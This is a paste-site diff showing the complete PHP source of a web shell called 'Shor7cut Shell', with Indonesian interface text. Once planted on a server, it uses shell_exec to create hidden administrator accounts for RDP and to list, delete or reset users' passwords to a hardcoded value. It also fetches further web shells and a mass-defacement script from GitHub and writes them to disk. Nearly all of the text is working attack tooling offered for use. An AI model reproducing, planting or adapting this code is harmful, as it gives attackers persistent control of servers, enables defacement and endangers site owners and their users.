View difference between Paste ID: irs2YGBG and A0Mc0SdD
SHOW: | | - or go back to the newest paste.
1
<?php 
2
error_reporting(0);
3
$local_host= shell_exec(hostname);
4
$server_ip = $_SERVER['SERVER_NAME'];
5
$gaya_root = "$local_host:~ ";
6
$phpv = @phpversion();
7
$o = "<br>";
8
9
10
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
11
    $status_os = '<font color="greenyellow">Windows</font>/<font color="redpink">Linux</font>';
12
    $status_work = '<font color="greenyellow">Dapat Digunakan</font><br>'; 
13
} else {
14
    $status_os   = '<font color="redpink">Windows</font>/<font color="greenyellow">Linux</font>';
15
    $status_work = '<font color="red">Tidak Dapat Digunakan</font><br>'; 
16
}
17
?><!DOCTYPE html>
18
<html>
19
<head>
20
	<title>Shor7cut Shell (Beta Killer)</title>
21
	<link rel='shortcut icon' type='image/x-icon' href='http://s24.postimg.org/glkiiddg5/frog_152630_1280.png' />
22
	<meta name="description" content="Shor7cut Shell (Beta Killer)">
23
	<meta name="viewport" content="width=device-width, initial-scale=1">
24
	<style type="text/css">
25
	body {
26
    background: black;
27
    color: #00FF00;
28
    font-family: monospace;
29
}
30
31
.accessGranted {
32
    position: absolute;
33
    top: 200px;
34
    background: #333;
35
    padding: 20px;
36
    border: 1px solid #999;
37
    width: 300px;
38
    left: 50%;
39
    margin-left: -150px;
40
    text-align: center;
41
}
42
43
.accessDenied {
44
    position: absolute;
45
    top: 200px;
46
    color: #F00;
47
    background: #511;
48
    padding: 20px;
49
    border: 1px solid #F00;
50
    width: 300px;
51
    left: 50%;
52
    margin-left: -150px;
53
    text-align: center;
54
}
55
#content-center {
56
    width: 400px;
57
    padding: 0px 10px 10px 10px;
58
    width: 800px; 
59
    margin: 0 auto;
60
}
61
#content-left {
62
margin: 0 auto;
63
     text-align: left;
64
}
65
#content-right {
66
margin: 0 auto;
67
     text-align: right;
68
}
69
input,select,textarea{
70
    border:0;
71
    border:1px solid #900;
72
    background:black;
73
    margin:0;
74
        color: white;
75
76
    padding:2px 4px;
77
}
78
input:hover,textarea:hover,select:hover{
79
    background:black;
80
        color: red;
81
82
    border:1px solid #f00;
83
}
84
                        a{ text-decoration:none; color:red;}
85
</style>
86
</head>
87
<body>
88
<div id="content-center">
89
<pre>
90
     _    _
91
    (o)--(o)
92
   /.______.\   Code By SHOR7CUT | <font color="red">INDON</font><font color="white">ESIA</font> RAYA
93
   \________/   OS Server : <?php echo php_uname("s")." | "; echo "{".$status_os."}<br>";?>
94
  ./        \.  Informasi : <?php echo "Server IP - ".$server_ip." {".$_SERVER['REMOTE_ADDR']."}";?> 
95
 ( .        , ) Info Tool : <?php echo $status_work;?>
96
  \ \_\\//_/ /
97
   ~~  ~~  ~~
98
</pre>
99
</div>
100
<?php if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'){?>
101
102
103
<div id="content-left">
104
<p>-| Create RDP  |-</p>
105
<form action="" method="post">Username : <input type="text" name="username" required> Password : <input type="text" name="password" required> <input type="hidden" name="kshell" value="1"><input type="submit" name="submit" value=">>">
106
</form>
107
</div>
108
109
110
<div id="content-left">
111
<p>-{ Option }-</p>
112
<form action="" method="post">!command : <input type="text" name="rusername" placeholder="Masukan Username"> <select name="aksi">
113
						<option value="1">Tampilkan Username</option>
114
						<option value="2">Hapus Username</option>
115
						<option value="3">Ubah Password</option>
116
				</select>
117
<input type="hidden" name="kshell" value="2">
118
<input type="submit" name="submit" value=">>"></form>
119
</div>
120
<?php }
121
?>
122
<div id="content-left">
123
<p>-{ Download Tools }-</p>
124
<form action="" method="post">!KTools  : <select name="download">
125
						<option value="1">K-MASS DEFACE (KILLER)</option>
126
						<option value="2">WSO-404 SHELL</option>
127
						<option value="3">B374K SHELL</option>
128
				</select>
129
<input type="hidden" name="kshell" value="3">
130
<input type="submit" name="submit" value=">>"></form>
131
</div>
132
133
134
135
<?php
136
if($_POST['submit']){
137
echo "<p>---------------{ INFO }---------------</p>";	
138
if($_POST['kshell']=="1"){
139
	$r_user = $_POST['username'];
140
	$r_pass = $_POST['password'];
141
	$cmd_cek_user   = shell_exec("net user"); 
142
	if(preg_match("/$r_user/", $cmd_cek_user)){
143
		echo $gaya_root.$r_user." sudah ada".$o;
144
	}else {
145
	$cmd_add_user   = shell_exec("net user ".$r_user." ".$r_pass." /add");
146
    $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
147
    $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
148
    $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
149
        
150
    	if($cmd_add_user){
151
    		echo $gaya_root."[add user]-> ".$r_user." <font color='greenyellow'>Berhasil</font>".$o;
152
    	}else {
153
    		echo $gaya_root."[add user]-> ".$r_user." <font color='red'>Gagal</font>".$o;
154
    	}
155
    	if($cmd_add_groups1){
156
              echo $gaya_root."[add localgroup Administrators]-> ".$r_user." <font color='greenyellow'>Berhasil</font>".$o;
157
    	}else
158
    	if($cmd_add_groups2){
159
              echo $gaya_root."[add localgroup Administrator]-> ".$r_user." <font color='greenyellow'>Berhasil</font>".$o;
160
    	}else
161
    	if($cmd_add_groups3){
162
              echo $gaya_root."[add localgroup Administrateur]-> ".$r_user." <font color='greenyellow'>Berhasil</font>".$o;
163
    	}else {
164
    		  echo $gaya_root."[add localgroup]-> ".$r_user." <font color='red'>Gagal - Contact Shor7sec</font>".$o;
165
    	}
166
			  echo $gaya_root."[INFO PC]-> RDP IP ".$_SERVER["HTTP_HOST"]." Username : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil</font>".$o;
167
168
	}
169
170
171
172
}else if($_POST['kshell']=="2"){
173
174
if($_POST['aksi']=="1"){
175
 echo "<pre>".shell_exec("net user");
176
}
177
else if($_POST['aksi']=="2"){
178
$username = $_POST['rusername'];
179
$cmd_cek_user   = shell_exec("net user");
180
	if (!empty($username)){
181
		if(preg_match("/$username/", $cmd_cek_user)){
182
		$cmd_add_user   = shell_exec("net user ".$username." /DELETE");
183
		if($cmd_add_user){ 
184
			echo $gaya_root."[remove user]-> ".$username." <font color='greenyellow'>Berhasil</font>".$o;
185
		}else {
186
			echo $gaya_root."[remove user]-> ".$username." <font color='red'>gagal</font>".$o;
187
		}
188
	}else {
189
		echo $gaya_root."[remove user]-> ".$username." <font color='red'>Tidak ditemukan</font>".$o;
190
	}
191
	}else {
192
		echo $gaya_root."[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font>".$o;
193
	}
194
}
195
else if($_POST['aksi']=="3"){
196
$username = $_POST['rusername'];
197
$password = "shor7cut";
198
$cmd_cek_user   = shell_exec("net user");
199
	if (!empty($username)){
200
		if(preg_match("/$username/", $cmd_cek_user)){
201
			$cmd_add_user   = shell_exec("net user ".$username." shor7cut");
202
			if($cmd_add_user){
203
			echo $gaya_root."[change password]-> (".$username."|".$password.") <font color='greenyellow'>Berhasil</font>".$o;
204
		}else {
205
			echo $gaya_root."[change password]-> (".$username."|".$password.") <font color='red'>GAGAL</font>".$o;
206
		}
207
	}else
208
{
209
	echo $gaya_root."[PESAN]-> <font color='red'>Username Tidak Ditemukan di server</font>".$o;
210
}
211
}else
212
{
213
	echo $gaya_root."[PESAN]-> <font color='red'>Kamu lupa masukin Username yang akan di delete</font>".$o;
214
}
215
		
216
}
217
218
219
220
}if($_POST['kshell']=="3"){
221
if($_POST['download']=="1"){
222
$files = file_get_contents("https://raw.githubusercontent.com/ekasyahwan/php/master/k-mass%20deface.php");
223
$status = file_put_contents("k-mass.php", $files);
224
if($status){
225
	echo '<a href="k-mass.php" target="_blank">K-MASS DEFACE</a>';
226
}else {
227
	echo '<font color="red">Gagal Mendownload</font>, PHP versi '.$phpv;
228
}
229
}else if($_POST['download']=="2"){
230
$files = file_get_contents("https://raw.githubusercontent.com/ekasyahwan/Bug7Sec/master/Minimonback-Bug7Sec/wso-bug7sec.php");
231
$status = file_put_contents("wso-bug7sec.php", $files);
232
if($status){
233
	echo '<a href="wso-bug7sec.php" target="_blank">Wso Bug7sec</a> password : bug7sec';
234
}else {
235
	echo '<font color="red">Gagal Mendownload</font>, PHP versi '.$phpv;
236
}
237
}else if($_POST['download']=="3"){
238
$files = file_get_contents("https://raw.githubusercontent.com/ekasyahwan/php/master/b374k-28.php");
239
$status = file_put_contents("b374k-28.php", $files);
240
if($status){
241
	echo '<a href="b374k-28.php" target="_blank">Wso Bug7sec</a> password : bug7sec';
242
}else {
243
	echo '<font color="red">Gagal Mendownload</font>, PHP versi '.$phpv;
244
}
245
}
246
}
247
}	
248
?>
249
250
</pre>
251
</body>
252
</html>